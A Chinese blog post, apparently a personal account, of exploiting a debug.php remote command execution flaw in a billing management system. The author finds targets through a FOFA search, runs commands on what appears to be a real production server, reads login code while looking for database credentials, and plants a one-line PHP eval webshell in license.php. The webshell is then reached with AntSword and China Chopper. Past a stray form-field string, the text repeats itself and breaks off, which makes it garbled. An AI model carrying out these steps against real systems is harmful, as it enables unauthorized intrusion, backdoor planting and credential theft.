半夜洗完澡，等睡觉，就说复现个漏洞，练练手。

谁知道，他开始了。。。

嗯就是你了debug.php 远程命令执行漏洞，fofa上号，关键词title="蓝海卓越计费管理系统"，一个一个试一个一个找，终于他找到了。

正文

试试id

试试whoami

确认当前目录

那就不客气了，看看本目录下有啥

$ ls -l
total 101632
-rw-r--r-- 1 toor root 0 May 21 15:39 +user_1ist.php
-rw-r--r-- 1 toor root 49662475 May 21 14:45 1.tar.gz
-rw-r--r-- 1 toor root 3192358 May 22 00:47 12.txt
-rw-r--r-- 1 toor root 0 May 21 10:49 13,txt
-rw-r--r-- 1 toor root 0 May 21 10:36 13.txt
-rw-r--r-- 1 toor root 0 May 21 11:12 16.txt
-rw-r--r-- 1 toor root 49666353 May 21 14:56 2.tar.gz
-rw-r--r-- 1 toor root 0 May 21 15:06 222.txt
drwxr-xr-x 2 toor root 520 Dec 6 2015 PHPExcel
-rwxr-xr-x 1 toor root 4139 Dec 6 2015 aaacron.php
-rwxr-xr-x 1 toor root 9229 Dec 6 2015 addagent.php
-rwxr-xr-x 1 toor root 1139 Dec 6 2015 agent_setstate.php
-rwxr-xr-x 1 toor root 5832 Dec 6 2015 agentlist.php
-rwxr-xr-x 1 toor root 3798 Dec 6 2015 agentnotice.php
-rwxr-xr-x 1 toor root 5453 Dec 6 2015 agentop.php
drwxr-xr-x 2 toor root 100 Dec 6 2015 ajax
-rwxr-xr-x 1 toor root 57461 Dec 6 2015 ajax_check.php
-rwxr-xr-x 1 toor root 5551 Dec 6 2015 alcatel_notice.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 backup
-rwxr-xr-x 1 toor root 1212 Dec 6 2015 backup_tb.php
-rwxr-xr-x 1 toor root 493 Dec 6 2015 bak_event.php
drwxr-xr-x 2 toor root 100 Dec 6 2015 blackbox
-rwxr-xr-x 1 toor root 9877 Dec 6 2015 card.php
-rwxr-xr-x 1 toor root 4679 Dec 6 2015 card_add.php
-rwxr-xr-x 1 toor root 277 Dec 6 2015 card_del.php
-rwxr-xr-x 1 toor root 8500 Dec 6 2015 card_search.php
-rwxr-xr-x 1 toor root 1278 Dec 6 2015 card_sold_print.php
-rwxr-xr-x 1 toor root 5653 Dec 6 2015 card_sold_show.php
-rwxr-xr-x 1 toor root 2103 Dec 6 2015 chart_product.php
-rwxr-xr-x 1 toor root 1581 Dec 6 2015 chart_product_data.php
-rwxr-xr-x 1 toor root 1446 Dec 6 2015 chart_report.php
-rwxr-xr-x 1 toor root 2352 Dec 6 2015 chart_report_data.php
-rwxr-xr-x 1 toor root 1869 Dec 6 2015 chart_report_pie.php
-rwxr-xr-x 1 toor root 1733 Dec 6 2015 chart_report_pie_data.php
-rwxr-xr-x 1 toor root 1375 Dec 6 2015 chart_user.php
-rwxr-xr-x 1 toor root 3272 Dec 6 2015 chart_user_data.php
-rwxr-xr-x 1 toor root 1573 Dec 6 2015 configAlter.php
-rwxr-xr-x 1 toor root 20176 Dec 6 2015 cron.php
drwxr-xr-x 2 toor root 80 Dec 6 2015 css
drwxr-xr-x 2 toor root 60 Dec 6 2015 data
-rwxr-xr-x 1 toor root 64 Dec 6 2015 db.opt
-rwxr-xr-x 1 toor root 2106 Dec 6 2015 db_auto.php
-rwxr-xr-x 1 toor root 4734 Dec 6 2015 db_backup.php
-rwxr-xr-x 1 toor root 8007 Dec 6 2015 db_backup_tb.php
-rwxr-xr-x 1 toor root 5399 Dec 6 2015 db_restore.php
-rwxr-xr-x 1 toor root 11422 Dec 6 2015 db_user_import.php
-rwxr-xr-x 1 toor root 3296 Dec 6 2015 debug.php
-rwxr-xr-x 1 toor root 1010 Dec 6 2015 delagent.php
-rwxr-xr-x 1 toor root 779 Dec 6 2015 download.php
-rw-r--r-- 1 toor root 0 May 21 00:37 echo
-rwxr-xr-x 1 toor root 11178 Dec 6 2015 editagent.php
-rwxr-xr-x 1 toor root 3498 Dec 6 2015 endtime_modification.php
-rwxr-xr-x 1 toor root 5671 Dec 6 2015 finance_MTC_add.php
-rwxr-xr-x 1 toor root 14458 Dec 6 2015 finance_details.php
-rwxr-xr-x 1 toor root 23320 Dec 6 2015 finance_report.php
-rwxr-xr-x 1 toor root 7546 Dec 6 2015 financial_subjects.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 ftpbackup
-rwxr-xr-x 1 toor root 2465 Dec 6 2015 guestbook.php
-rwxr-xr-x 1 toor root 2661 Dec 6 2015 guestbook_reply.php
drwxr-xr-x 2 toor root 2820 Dec 6 2015 img
drwxr-xr-x 2 toor root 420 Dec 6 2015 inc
-rwxr-xr-x 1 toor root 2169 Dec 6 2015 index.php
-rwxr-xr-x 1 toor root 5567 Dec 6 2015 instantPaymen.php
-rwxr-xr-x 1 toor root 4003 Dec 6 2015 ippool.php
-rwxr-xr-x 1 toor root 3342 Dec 6 2015 ippool_add.php
-rwxr-xr-x 1 toor root 573 Dec 6 2015 ippool_del.php
-rwxr-xr-x 1 toor root 3433 Dec 6 2015 ippool_edit.php
-rwx------ 1 toor root 1043 Dec 6 2015 jm.php
drwxr-xr-x 4 toor root 220 Dec 6 2015 js
-rwxrwxrwx 1 toor root 40 May 21 16:10 kk.php
-rwxr-xr-x 1 toor root 14708 Dec 6 2015 left.php
-rwxr-xr-x 1 toor root 101 Dec 6 2015 license.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 locale
-rwxr-xr-x 1 toor root 2913 Dec 6 2015 login.php
-rwxr-xr-x 1 toor root 1593 Dec 6 2015 login_check.php
-rwxr-xr-x 1 toor root 571 Dec 6 2015 login_out.php
-rwxr-xr-x 1 toor root 8961 Dec 6 2015 mail_backup.php
-rwxr-xr-x 1 toor root 8919 Dec 6 2015 main.php
-rwxr-xr-x 1 toor root 6414 Dec 6 2015 manager.php
-rwxr-xr-x 1 toor root 5217 Dec 6 2015 manager_add.php
-rwxr-xr-x 1 toor root 333 Dec 6 2015 manager_del.php
-rwxr-xr-x 1 toor root 14319 Dec 6 2015 manager_edit.php
-rwxr-xr-x 1 toor root 2356 Dec 6 2015 manager_group.php
-rwxr-xr-x 1 toor root 4703 Dec 6 2015 manager_group_add.php
-rwxr-xr-x 1 toor root 452 Dec 6 2015 manager_group_del.php
-rwxr-xr-x 1 toor root 4953 Dec 6 2015 manager_group_edit.php
-rwxr-xr-x 1 toor root 11251 Dec 6 2015 manager_permision.php
-rwxr-xr-x 1 toor root 2937 Dec 6 2015 manager_pwd_edit.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 mnt
-rwxr-xr-x 1 toor root 24926 Dec 6 2015 more_add.php
-rwxr-xr-x 1 toor root 2166 Dec 6 2015 more_add_save.php
-rw-r--r-- 1 toor root 4 May 21 00:42 ni.php
-rwxr-xr-x 1 toor root 5482 Dec 6 2015 njtn_fttx.php
-rwxr-xr-x 1 toor root 8715 Dec 6 2015 njtn_region.php
-rwxr-xr-x 1 toor root 4439 Dec 6 2015 njtnisp_add.php
-rwxr-xr-x 1 toor root 5558 Dec 6 2015 njtnisp_edit.php
-rwxr-xr-x 1 toor root 2797 Dec 6 2015 njtnisp_list.php
-rwxr-xr-x 1 toor root 1079 Dec 6 2015 online.php
-rwxr-xr-x 1 toor root 5452 Dec 6 2015 opagent.php
-rwxr-xr-x 1 toor root 53629 Dec 6 2015 open-flash-chart.swf
-rwxr-xr-x 1 toor root 4201 Dec 6 2015 operate_login_log.php
-rwxr-xr-x 1 toor root 8813 Dec 6 2015 operate_netplay_log.php
-rwxr-xr-x 1 toor root 9649 Dec 6 2015 operate_online.php
-rwxr-xr-x 1 toor root 5280 Dec 6 2015 operate_userlog.php
-rwxr-xr-x 1 toor root 8204 Dec 6 2015 order.php
-rwxr-xr-x 1 toor root 40164 Dec 6 2015 order_add.php
-rwxr-xr-x 1 toor root 448 Dec 6 2015 order_del.php
-rwxr-xr-x 1 toor root 5311 Dec 6 2015 order_run.php
-rwxr-xr-x 1 toor root 4677 Dec 6 2015 order_ticket.php
-rwxr-xr-x 1 toor root 6456 Dec 6 2015 pause.php
-rwx------ 1 toor root 520 Dec 6 2015 pdo.php
drwxr-xr-x 2 toor root 80 Dec 6 2015 php-ofc-library
-rwxr-xr-x 1 toor root 19 May 20 19:59 phpinfo.php
drwxr-xr-x 3 toor root 120 Dec 6 2015 phpmailer
-rwxr-xr-x 1 toor root 7998 Dec 6 2015 product.php
-rwxr-xr-x 1 toor root 29764 Dec 6 2015 product_add.php
-rwxr-xr-x 1 toor root 584 Dec 6 2015 product_del.php
-rwxr-xr-x 1 toor root 27481 Dec 6 2015 product_edit.php
-rwxr-xr-x 1 toor root 5984 Dec 6 2015 project.php
-rwxr-xr-x 1 toor root 18772 Dec 6 2015 project_add.php
-rwxr-xr-x 1 toor root 731 Dec 6 2015 project_del.php
-rwxr-xr-x 1 toor root 22354 Dec 6 2015 project_edit.php
-rwxr-xr-x 1 toor root 7087 Dec 6 2015 project_ros.php
-rwxr-xr-x 1 toor root 5012 Dec 6 2015 receipt_list.php
-rwxr-xr-x 1 toor root 10531 Dec 6 2015 recharge_log.php
-rwxr-xr-x 1 toor root 5670 Dec 6 2015 recharge_reverse.php
-rwxr-xr-x 1 toor root 10604 Dec 6 2015 recharge_user.php
-rwxr-xr-x 1 toor root 5231 Dec 6 2015 rechargeagent.php
-rwxr-xr-x 1 toor root 7333 Dec 6 2015 repair.php
-rwxr-xr-x 1 toor root 3258 Dec 6 2015 repair_add.php
-rwxr-xr-x 1 toor root 345 Dec 6 2015 repair_del.php
-rwxr-xr-x 1 toor root 6547 Dec 6 2015 repair_disposal.php
-rwxr-xr-x 1 toor root 229 Dec 6 2015 repair_disposal_del.php
-rwxr-xr-x 1 toor root 6577 Dec 6 2015 repair_disposal_edit.php
-rwxr-xr-x 1 toor root 5476 Dec 6 2015 repair_disposal_log.php
-rwxr-xr-x 1 toor root 2596 Dec 6 2015 repair_edit.php
-rwxr-xr-x 1 toor root 3728 Dec 6 2015 repair_show_print.php
-rwxr-xr-x 1 toor root 11115 Dec 6 2015 ros_static_ip.php
-rwxr-xr-x 1 toor root 5901 Dec 6 2015 ros_write.php
-rwxr-xr-x 1 toor root 5205 Dec 6 2015 scan_dayparting.php
-rwxr-xr-x 1 toor root 1750 Dec 6 2015 scan_db_backup.php
-rwxr-xr-x 1 toor root 1586 Dec 6 2015 scan_down_line.php
-rwxr-xr-x 1 toor root 8360 Dec 6 2015 scan_everyone_hour.php
-rwxr-xr-x 1 toor root 8051 Dec 6 2015 scan_flow_limit.php
-rwxr-xr-x 1 toor root 1659 Dec 6 2015 scan_hour_flow.php
-rwxr-xr-x 1 toor root 1298 Dec 6 2015 scan_order_status.php
-rwxr-xr-x 1 toor root 4775 Dec 6 2015 scan_stop_restore.php
-rwxr-xr-x 1 toor root 43623 Dec 6 2015 scan_time_len.php
-rwxr-xr-x 1 toor root 509 Dec 6 2015 scan_timeout.php
-rwxr-xr-x 1 toor root 2109 Dec 6 2015 sendmail_backup.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 sendmailbackup
-rwxr-xr-x 1 toor root 5280 Dec 6 2015 sendsms.php
-rwxr-xr-x 1 toor root 2175 Dec 6 2015 short_messages.php
-rwxr-xr-x 1 toor root 2916 Dec 6 2015 speedrule.php
-rwxr-xr-x 1 toor root 3756 Dec 6 2015 speedrule_add.php
-rwxr-xr-x 1 toor root 229 Dec 6 2015 speedrule_del.php
-rwxr-xr-x 1 toor root 4681 Dec 6 2015 speedrule_edit.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 style
-rwxr-xr-x 1 toor root 2783 Dec 6 2015 system_config.php
-rwxr-xr-x 1 toor root 7461 Dec 6 2015 system_configuration.php
-rwxr-xr-x 1 toor root 2338 Dec 6 2015 system_database.php
-rwxr-xr-x 1 toor root 5054 Dec 6 2015 system_del_dial_log.php
-rwxr-xr-x 1 toor root 3370 Dec 6 2015 system_mac.php
-rwxr-xr-x 1 toor root 12563 Dec 6 2015 system_message_config.php
-rwxr-xr-x 1 toor root 3203 Dec 6 2015 system_message_d.php
-rwxr-xr-x 1 toor root 3603 Dec 6 2015 system_message_g.php
-rwxr-xr-x 1 toor root 3170 Dec 6 2015 system_message_j.php
-rwxr-xr-x 1 toor root 3664 Dec 6 2015 system_message_k.php
-rwxr-xr-x 1 toor root 3261 Dec 6 2015 system_message_v.php
-rwxr-xr-x 1 toor root 3643 Dec 6 2015 system_message_x.php
-rwxr-xr-x 1 toor root 5512 Dec 6 2015 system_publicnotice.php
-rwxr-xr-x 1 toor root 2733 Dec 6 2015 system_upgrade.php
-rwxr-xr-x 1 toor root 35505 May 22 00:00 t.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 tb_backup
-rwxr-xr-x 1 toor root 1356 Dec 6 2015 test.php
-rwxr-xr-x 1 toor root 14960 Dec 6 2015 top.php
-rwxr-xr-x 1 toor root 4989 Dec 6 2015 truncate_alltable.php
-rwxrwxrwx 1 toor root 26 May 21 08:57 tui.php
-rwxrwxrwx 1 toor root 48 May 21 09:16 ty.php
-rwxrwxrwx 1 toor root 23 May 21 09:17 ty1.php
-rwxr-xr-x 1 toor root 20010 Dec 6 2015 user.php
-rwxr-xr-x 1 toor root 27496 Dec 6 2015 user_add.php
-rwxr-xr-x 1 toor root 5591 Dec 6 2015 user_assigned.php
-rwxr-xr-x 1 toor root 9119 Dec 6 2015 user_bill.php
-rwxr-xr-x 1 toor root 7273 Dec 6 2015 user_change_banwith.php
-rwxr-xr-x 1 toor root 7175 Dec 6 2015 user_closing.php
-rwxr-xr-x 1 toor root 13985 Dec 6 2015 user_closing_info.php
-rwxr-xr-x 1 toor root 3709 Dec 6 2015 user_del.php
-rwxr-xr-x 1 toor root 1926 Dec 6 2015 user_down_line.php
-rwxr-xr-x 1 toor root 31015 Dec 6 2015 user_edit.php
-rwxr-xr-x 1 toor root 8433 Dec 6 2015 user_flow_monitor.php
-rwxr-xr-x 1 toor root 9098 Dec 6 2015 user_hours_show.php
-rw-r--r-- 1 toor root 8 May 21 08:35 user_list.txt
-rwxr-xr-x 1 toor root 12429 Dec 6 2015 user_maturity.php
-rwxr-xr-x 1 toor root 6240 Dec 6 2015 user_move.php
-rwxr-xr-x 1 toor root 9520 Dec 6 2015 user_netbar.php
-rwxr-xr-x 1 toor root 13821 Dec 6 2015 user_normal_info.php
-rwxr-xr-x 1 toor root 12393 Dec 6 2015 user_pause.php
-rwxr-xr-x 1 toor root 5114 Dec 6 2015 user_pledgemoney.php
-rwxr-xr-x 1 toor root 13560 Dec 6 2015 user_replac_product.php
-rwxr-xr-x 1 toor root 2235 Dec 6 2015 user_rewrite.php
-rwxr-xr-x 1 toor root 26475 Dec 6 2015 user_show_print.php
-rwxr-xr-x 1 toor root 7698 Dec 6 2015 user_shutdown.php
-rwxr-xr-x 1 toor root 12953 Dec 6 2015 user_upcoming.php
-rwxr-xr-x 1 toor root 2168 May 20 20:07 userlog_table_attr.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 usr
-rwxr-xr-x 1 toor root 3080 Dec 6 2015 vcodelogin.php

那就先找数据库配置吧，看看login_check.php

$ cat login_check.php
#!/bin/php
include("inc/conn.php");
date_default_timezone_set('Asia/Shanghai');
if($_POST)
{
$_POST=filtersql($_POST);
$manager_account=$_POST["username"];
$manager_passwd =md5($_POST["pwd"]);
$record =$db->select_one("*","manager","manager_account='".$manager_account."' and manager_passwd='".$manager_passwd."'");
if($record)
{
$_SESSION["managerID"] =$record["ID"];
$_SESSION["manager"] =$record["manager_account"];
$_SESSION["auth_permision"] =explode("#",$record["manager_permision"]);
$_SESSION["auth_project"] =empty($record["manager_project"])?"0":$record["manager_project"];
$_SESSION["auth_gradeID"] =empty($record["manager_gradeID"])?"0":$record["manager_gradeID"];
$_SESSION["addusernum"] =$record["addusernum"];
$_SESSION["addusertotalnum"] =$record["addusertotalnum"];
$_SESSION["managerlogintime"] =time();
$productID=empty($record["manager_product"])?"0":$record["manager_product"];
$product=$db->select_all('productID',"productandproject","projectID in (".$_SESSION["auth_project"].") and productID in (".$productID.")");
if(is_array($product))
{
foreach($product as $prs)
{
$pID.=$prs['productID'].",";
}
$pID = rtrim($pID,",");
$_SESSION["auth_product"]=empty($pID)?"0":$pID ;
}
else
{
$_SESSION["auth_product"]=0;
}
$sql=array(
"name"=>$_SESSION["manager"],
"logindatetime"=>date("Y-m-d H:i:s",time()),
"loginip"=>getClientIp(),
"content"=>$_SERVER['REQUEST_URI']
);
$db->insert_new("loginlog",$sql);
echo "ok";
}
else
{
echo "err";
}
}
?>

阿，原来它包含了个inc/conn.php文件，咱们看一下

哦~它数据库在本机啊，那就连一下，在vm中忙了一通，结果发现貌似连不上，失败了。

不对啊，应该有开端口吧，结果网上一查，6379没开，完了。没得玩了。

我用dnslog查回显，咦，怎么回事，和网址ip不一样啊，可能是内网主机，没直接连接到公网。

查看ifconfig -a

$ ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:90:27:FF:67:B2
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16 Memory:fe6e0000-fe700000

eth1 Link encap:Ethernet HWaddr 00:90:27:FF:67:B3
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:17 Memory:fe7e0000-fe800000

eth2 Link encap:Ethernet HWaddr 00:90:27:FF:67:B4
inet addr:192.168.2.201 Bcast:192.168.2.255 Mask:255.255.255.0
inet6 addr: fe80::290:27ff:feff:67b4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:966110 errors:0 dropped:0 overruns:0 frame:0
TX packets:1100154 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:139520684 (133.0 MiB) TX bytes:403410471 (384.7 MiB)
Interrupt:18 Memory:fe8e0000-fe900000

eth3 Link encap:Ethernet HWaddr 00:90:27:FF:67:B5
inet addr:192.168.3.1 Bcast:192.168.3.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:19 Memory:fe9e0000-fea00000

eth4 Link encap:Ethernet HWaddr 00:90:27:FF:67:B6
inet addr:192.168.4.1 Bcast:192.168.4.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16 Memory:feae0000-feb00000

eth5 Link encap:Ethernet HWaddr 00:90:27:FF:67:B7
inet addr:192.168.5.1 Bcast:192.168.5.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:17 Memory:febe0000-fec00000

gre0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-20-00-00-00-00-00-00-00-00-00
NOARP MTU:1476 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

gretap0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
BROADCAST MULTICAST MTU:1462 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

ip_vti0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-20-00-00-00-00-00-00-00-00-00
NOARP MTU:1364 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:6024897 errors:0 dropped:0 overruns:0 frame:0
TX packets:6024897 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1739123468 (1.6 GiB) TX bytes:1739123468 (1.6 GiB)

sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

teql0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

tunl0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-20-00-00-00-00-00-00-00-00-00
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

查看route -n

可见确实是内网主机，且它在192.168.2.x段，ping 192.168.2.200 是通的

那怎么办好呢？

要不写个马吧

先phpinfo();测试下

使用echo函数慢慢写入

echo '<?php '>999.php
echo 'phpinfo();'>>999.php

直接访问，嗯？权限不足？

嗯，实是权限不足，我也不会提高他权限啊，怎么办呢？

在思考的过程中，随便看了下，发现了有个叫license.php的文件。这个权限高啊-rwxr-xr-x，尝试重写修改，好家伙，权限不变！咱们来看下

嗯，好玩了

都变的有趣了，上马！

就@eval($_GET[pass]);一句话吧

蚁剑！测试！

狗东西，上线了！

咱来看看有啥好东西！

怎么回事？html转义了？

啥傻逼玩意？怎么办啊？

目前太晚了，只好等明早问问大佬们了。。。

哦对了，既然能包含inc/conn.php，也能修改文件，那我能不能去问问它账号密码呢？有待思考！

最后用菜刀连接上了且不报错！&hidden_post_status=draft&wp-content-editor-container-html-code=半夜洗完澡，等睡觉，就说复现个漏洞，练练手。
谁知道，他开始了。。。
嗯就是你了debug.php 远程命令执行漏洞，fofa上号，关键词title="蓝海卓越计费管理系统"，一个一个试一个一个找，终于他找到了。

试试id

试试whoami

确认当前目录

那就不客气了，看看本目录下有啥

$ ls -l
total 101632
-rw-r--r-- 1 toor root 0 May 21 15:39 +user_1ist.php
-rw-r--r-- 1 toor root 49662475 May 21 14:45 1.tar.gz
-rw-r--r-- 1 toor root 3192358 May 22 00:47 12.txt
-rw-r--r-- 1 toor root 0 May 21 10:49 13,txt
-rw-r--r-- 1 toor root 0 May 21 10:36 13.txt
-rw-r--r-- 1 toor root 0 May 21 11:12 16.txt
-rw-r--r-- 1 toor root 49666353 May 21 14:56 2.tar.gz
-rw-r--r-- 1 toor root 0 May 21 15:06 222.txt
drwxr-xr-x 2 toor root 520 Dec 6 2015 PHPExcel
-rwxr-xr-x 1 toor root 4139 Dec 6 2015 aaacron.php
-rwxr-xr-x 1 toor root 9229 Dec 6 2015 addagent.php
-rwxr-xr-x 1 toor root 1139 Dec 6 2015 agent_setstate.php
-rwxr-xr-x 1 toor root 5832 Dec 6 2015 agentlist.php
-rwxr-xr-x 1 toor root 3798 Dec 6 2015 agentnotice.php
-rwxr-xr-x 1 toor root 5453 Dec 6 2015 agentop.php
drwxr-xr-x 2 toor root 100 Dec 6 2015 ajax
-rwxr-xr-x 1 toor root 57461 Dec 6 2015 ajax_check.php
-rwxr-xr-x 1 toor root 5551 Dec 6 2015 alcatel_notice.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 backup
-rwxr-xr-x 1 toor root 1212 Dec 6 2015 backup_tb.php
-rwxr-xr-x 1 toor root 493 Dec 6 2015 bak_event.php
drwxr-xr-x 2 toor root 100 Dec 6 2015 blackbox
-rwxr-xr-x 1 toor root 9877 Dec 6 2015 card.php
-rwxr-xr-x 1 toor root 4679 Dec 6 2015 card_add.php
-rwxr-xr-x 1 toor root 277 Dec 6 2015 card_del.php
-rwxr-xr-x 1 toor root 8500 Dec 6 2015 card_search.php
-rwxr-xr-x 1 toor root 1278 Dec 6 2015 card_sold_print.php
-rwxr-xr-x 1 toor root 5653 Dec 6 2015 card_sold_show.php
-rwxr-xr-x 1 toor root 2103 Dec 6 2015 chart_product.php
-rwxr-xr-x 1 toor root 1581 Dec 6 2015 chart_product_data.php
-rwxr-xr-x 1 toor root 1446 Dec 6 2015 chart_report.php
-rwxr-xr-x 1 toor root 2352 Dec 6 2015 chart_report_data.php
-rwxr-xr-x 1 toor root 1869 Dec 6 2015 chart_report_pie.php
-rwxr-xr-x 1 toor root 1733 Dec 6 2015 chart_report_pie_data.php
-rwxr-xr-x 1 toor root 1375 Dec 6 2015 chart_user.php
-rwxr-xr-x 1 toor root 3272 Dec 6 2015 chart_user_data.php
-rwxr-xr-x 1 toor root 1573 Dec 6 2015 configAlter.php
-rwxr-xr-x 1 toor root 20176 Dec 6 2015 cron.php
drwxr-xr-x 2 toor root 80 Dec 6 2015 css
drwxr-xr-x 2 toor root 60 Dec 6 2015 data
-rwxr-xr-x 1 toor root 64 Dec 6 2015 db.opt
-rwxr-xr-x 1 toor root 2106 Dec 6 2015 db_auto.php
-rwxr-xr-x 1 toor root 4734 Dec 6 2015 db_backup.php
-rwxr-xr-x 1 toor root 8007 Dec 6 2015 db_backup_tb.php
-rwxr-xr-x 1 toor root 5399 Dec 6 2015 db_restore.php
-rwxr-xr-x 1 toor root 11422 Dec 6 2015 db_user_import.php
-rwxr-xr-x 1 toor root 3296 Dec 6 2015 debug.php
-rwxr-xr-x 1 toor root 1010 Dec 6 2015 delagent.php
-rwxr-xr-x 1 toor root 779 Dec 6 2015 download.php
-rw-r--r-- 1 toor root 0 May 21 00:37 echo
-rwxr-xr-x 1 toor root 11178 Dec 6 2015 editagent.php
-rwxr-xr-x 1 toor root 3498 Dec 6 2015 endtime_modification.php
-rwxr-xr-x 1 toor root 5671 Dec 6 2015 finance_MTC_add.php
-rwxr-xr-x 1 toor root 14458 Dec 6 2015 finance_details.php
-rwxr-xr-x 1 toor root 23320 Dec 6 2015 finance_report.php
-rwxr-xr-x 1 toor root 7546 Dec 6 2015 financial_subjects.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 ftpbackup
-rwxr-xr-x 1 toor root 2465 Dec 6 2015 guestbook.php
-rwxr-xr-x 1 toor root 2661 Dec 6 2015 guestbook_reply.php
drwxr-xr-x 2 toor root 2820 Dec 6 2015 img
drwxr-xr-x 2 toor root 420 Dec 6 2015 inc
-rwxr-xr-x 1 toor root 2169 Dec 6 2015 index.php
-rwxr-xr-x 1 toor root 5567 Dec 6 2015 instantPaymen.php
-rwxr-xr-x 1 toor root 4003 Dec 6 2015 ippool.php
-rwxr-xr-x 1 toor root 3342 Dec 6 2015 ippool_add.php
-rwxr-xr-x 1 toor root 573 Dec 6 2015 ippool_del.php
-rwxr-xr-x 1 toor root 3433 Dec 6 2015 ippool_edit.php
-rwx------ 1 toor root 1043 Dec 6 2015 jm.php
drwxr-xr-x 4 toor root 220 Dec 6 2015 js
-rwxrwxrwx 1 toor root 40 May 21 16:10 kk.php
-rwxr-xr-x 1 toor root 14708 Dec 6 2015 left.php
-rwxr-xr-x 1 toor root 101 Dec 6 2015 license.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 locale
-rwxr-xr-x 1 toor root 2913 Dec 6 2015 login.php
-rwxr-xr-x 1 toor root 1593 Dec 6 2015 login_check.php
-rwxr-xr-x 1 toor root 571 Dec 6 2015 login_out.php
-rwxr-xr-x 1 toor root 8961 Dec 6 2015 mail_backup.php
-rwxr-xr-x 1 toor root 8919 Dec 6 2015 main.php
-rwxr-xr-x 1 toor root 6414 Dec 6 2015 manager.php
-rwxr-xr-x 1 toor root 5217 Dec 6 2015 manager_add.php
-rwxr-xr-x 1 toor root 333 Dec 6 2015 manager_del.php
-rwxr-xr-x 1 toor root 14319 Dec 6 2015 manager_edit.php
-rwxr-xr-x 1 toor root 2356 Dec 6 2015 manager_group.php
-rwxr-xr-x 1 toor root 4703 Dec 6 2015 manager_group_add.php
-rwxr-xr-x 1 toor root 452 Dec 6 2015 manager_group_del.php
-rwxr-xr-x 1 toor root 4953 Dec 6 2015 manager_group_edit.php
-rwxr-xr-x 1 toor root 11251 Dec 6 2015 manager_permision.php
-rwxr-xr-x 1 toor root 2937 Dec 6 2015 manager_pwd_edit.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 mnt
-rwxr-xr-x 1 toor root 24926 Dec 6 2015 more_add.php
-rwxr-xr-x 1 toor root 2166 Dec 6 2015 more_add_save.php
-rw-r--r-- 1 toor root 4 May 21 00:42 ni.php
-rwxr-xr-x 1 toor root 5482 Dec 6 2015 njtn_fttx.php
